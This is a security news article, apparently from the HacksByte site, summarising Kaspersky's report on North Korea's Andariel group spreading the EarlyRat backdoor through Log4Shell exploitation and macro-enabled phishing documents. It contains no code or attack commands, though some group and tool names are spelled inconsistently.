Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the penci-text-to-speech domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/revifuxl/hacksbyte.com/wp-includes/functions.php on line 6114

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the penci-bookmark-follow domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/revifuxl/hacksbyte.com/wp-includes/functions.php on line 6114

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the soledad domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/revifuxl/hacksbyte.com/wp-includes/functions.php on line 6114

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the penci-paywall domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/revifuxl/hacksbyte.com/wp-includes/functions.php on line 6114

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the penci-frontend-submission domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/revifuxl/hacksbyte.com/wp-includes/functions.php on line 6114
North Korean hacker group Andreal attacked with new EarlyRat malware – HacksByte

North Korean hacker group Andreal attacked with new EarlyRat malware

“Andreal infects machines by executing the Log4J exploit, which in turn downloads further malware from command-and-control (C2) servers,” Kaspersky said in a new report.

Also called Silent Cholima and Stonefly, Andarial is linked to North Korea’s Lab 110, a primary hacking unit that also includes APT38 (aka Bluenoroff) and other subordinate elements that are collectively tracked under the name Lazarus Group.

The threat actor is known to conduct cybercrime as an additional source of income for the sanctions-affected nation, in addition to conducting espionage attacks against foreign government and military entities of strategic interest.

Some of the major cyber-weapons in its arsenal include a ransomware strain called Maui, and several remote access trojans and backdoors such as Dtrack (aka Valephor and Preft), NukeSpeed (aka Manuscript), MagicRAT, and Yamabot.

NukeSped includes a range of features for creating and terminating processes and for transferring, reading and writing files on infected hosts. The use of NukeSped overlaps with a campaign tracked by the US Cybersecurity and Infrastructure Security Agency (CISA) under the name TraderTraitor.

Andarial’s weaponization of the log4shell vulnerability in unpatched VMware Horizon servers was first documented in 2022 by the AhnLabs Security Emergency Response Center (ASEC) and Cisco Talos.

The latest attack chain discovered by Kaspersky shows that EarlyRat is promoted via phishing emails that contain fake Microsoft Word documents. The files, when opened, prompt recipients to enable macros, thereby executing the VBA code responsible for downloading the Trojan.

Described as a simple but limited backdoor, EarlyRat is designed to execute arbitrary commands as well as collect and spit out system information on a remote server. It also shares high-level similarities with MagicRAT, not to mention being written using a framework called PureBasic. MagicRAT, on the other hand, uses the Qt framework.

Another overlooked tactic seen in attacks exploiting the Log4j Log4Shell vulnerability in the last year relates to the use of legitimate off-the-shelf tools such as 3Proxy, ForkDump, NTDSDumpEx, Powerline and PuTTY for further exploitation of the target.

“Despite being an APT group, Lazarus is known to perform specific cybercrime tasks, such as deploying ransomware, which further complicates the cybercrime landscape,” Kaspersky said. “In addition, the group uses a variety of custom tools, constantly updating existing ones and developing new malware.”

Related posts

Microsoft CEO Satya Nadella dreams of a world where India and every person on the planet is empowered by AI

Chinese hackers exploited FortiGate Flaw to break the Dutch Military Network

Russian Coldriver hackers are moving beyond phishing with custom malware

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Read More